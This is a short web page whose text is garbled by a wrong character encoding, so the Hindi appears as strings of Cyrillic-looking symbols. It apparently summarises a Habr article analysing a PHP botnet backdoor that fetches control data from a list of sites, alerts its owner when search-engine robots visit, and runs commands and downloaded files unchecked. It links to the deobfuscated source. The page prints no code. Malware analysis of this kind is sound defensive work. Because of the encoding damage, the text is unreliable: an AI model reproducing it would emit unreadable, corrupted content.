рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрдИ рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдлрд╝рдВрдХреНрд╢рдВрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреА рд╣реИ (рдХрд┐рд╕реА рдлрд╝рд╛рдЗрд▓ рдХреЛ рдкрдврд╝рдирд╛ / рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдирд╛ рдФрд░ рдХрд┐рд╕реА рдлрд╝рд╛рдЗрд▓ рдХреЛ рд▓рд┐рдЦрдирд╛), рдЬрдмрдХрд┐ рдЧреЗрдЯрдлрд╝рд╛рдЗрд▓ рдкрд╣рд▓реЗ рдХрд░реНрд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдФрд░ рд╕реЙрдХреЗрдЯ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕рдмрд╕реЗ рдЦрд░рд╛рдм рд╕реНрдерд┐рддрд┐ рдореЗрдВ рд╡рд┐рдлрд▓рддрд╛ рдХреЗ рдорд╛рдорд▓реЗ рдореЗрдВ file_get_contents рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕рд╛рдордЧреНрд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддрд╛ рд╣реИред
$ ArrSites рдЙрди рд╕рд╛рдЗрдЯреЛрдВ рдХреА рдПрдХ рд╕реВрдЪреА рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд░рддрд╛ рд╣реИ рдЬрд╣рд╛рдВ рд╕реЗ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдбреЗрдЯрд╛ рдкреНрд░рд╛рдкреНрдд рдХрд░рддреА рд╣реИ, рдЬрдмрдХрд┐ botnet рдХреЗ рдорд╛рд▓рд┐рдХ рдХреЛ рд╕рдВрдХреНрд░рдорд┐рдд рд╕рд╛рдЗрдЯ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╕реВрдЪрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдЬреИрд╕реЗ рд╣реА рдЦреЛрдЬ рдЗрдВрдЬрди рдореЗрдВ рд╕реЗ рдПрдХ рд░реЛрдмреЛрдЯ рдЙрд╕ рдкрд░ рдЖрддрд╛ рд╣реИред
рдпрджрд┐ рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рд▓рд┐рдП рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рд╣реИ, рддреЛ рдЗрд╕реЗ рдмрд┐рдирд╛ рдХрд┐рд╕реА рдЬрд╛рдВрдЪ рдХреЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред
рдирддреАрдЬрддрди, рд╣рдореЗрдВ рдПрдХ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдорд┐рд▓реА рдЬреЛ рдмреЙрдЯ-рдбреНрд░рд╛рдЗрд╡рд░ рд╕реЗ рдкреНрд░рд╛рдкреНрдд рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреА рд╣реИ рдФрд░ рдлрд╛рдЗрд▓реЗрдВ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░ рд╕рдХрддреА рд╣реИред
рдкреБрдирд╢реНрдЪ: deofuscation рдХреЗ рдмрд╛рдж рдореБрдЭреЗ рдЗрд╕ рдорд╛рд▓рд╡реЗрдпрд░ рдХрд╛ рд╕реЛрд░реНрд╕ рдХреЛрдб рдорд┐рд▓рд╛ - gist.github.com/ryepdx/5016252 ред

Source: https://habr.com/ru/post/In190682/

More articles:


All Articles